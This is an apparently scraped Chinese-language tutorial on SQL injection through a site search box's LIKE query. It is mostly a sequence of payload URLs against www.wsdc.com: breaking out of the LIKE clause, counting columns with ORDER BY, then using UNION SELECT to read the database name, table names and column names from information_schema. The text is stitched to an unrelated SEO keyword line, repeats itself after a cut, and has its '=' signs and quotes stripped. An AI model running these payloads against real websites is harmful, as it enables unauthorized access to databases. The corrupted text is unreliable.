网站策划书编写,阿里云部署多个网站,硬件开发基础知识,专营网站建设搜索型注入
原理是运用模糊查询#xff1a;
select * from users where username like %a%
1.找到具有模糊查询的搜索框的注入点 2.构造闭合
因为模糊查询的代码是
select * from users where username like %a%
所以应该
鱼%’ -- s
判断构造闭合的函数是否正确
鱼%…搜索型注入
原理是运用模糊查询
select * from users where username like %a%
1.找到具有模糊查询的搜索框的注入点 2.构造闭合
因为模糊查询的代码是
select * from users where username like %a%
所以应该
鱼%’ -- s
判断构造闭合的函数是否正确
鱼% and 11 -- s
http://www.wsdc.com/views/search_p.php?keyword鱼% and 11 -- s http://www.wsdc.com/views/search_p.php?keyword鱼% and 12 -- s 证明闭合成功
3.查询字段数
http://www.wsdc.com/views/search_p.php?keyword鱼% order by 10 -- s http://www.wsdc.com/views/search_p.php?keyword鱼% order by 5 -- s http://www.wsdc.com/views/search_p.php?keyword鱼% order by 7 -- s http://www.wsdc.com/views/search_p.php?keyword鱼% order by 8 -- s 所以说字段数为7
4.union联合查询判断回显点
http://www.wsdc.com/views/search_p.php?keyword鱼% union select 1,2,3,4,5,6,7 -- s 所以说回显点为2和6
5.查询数据库
http://www.wsdc.com/views/search_p.php?keyword鱼% union select 1,database(),3,4,5,6,7 -- s 6.查询表名
http://www.wsdc.com/views/search_p.php?keyword鱼% union select 1,database(),3,4,5,group_concat(table_name) ,7 from information_schema.tables where table_schemafood_db -- s 7.查询字段
http://www.wsdc.com/views/search_p.php?keyword鱼% union select 1,database(),3,4,5,group_concat(column_name) ,7 from information_schema.columns where table_schemafood_db and table_namecollection -- s
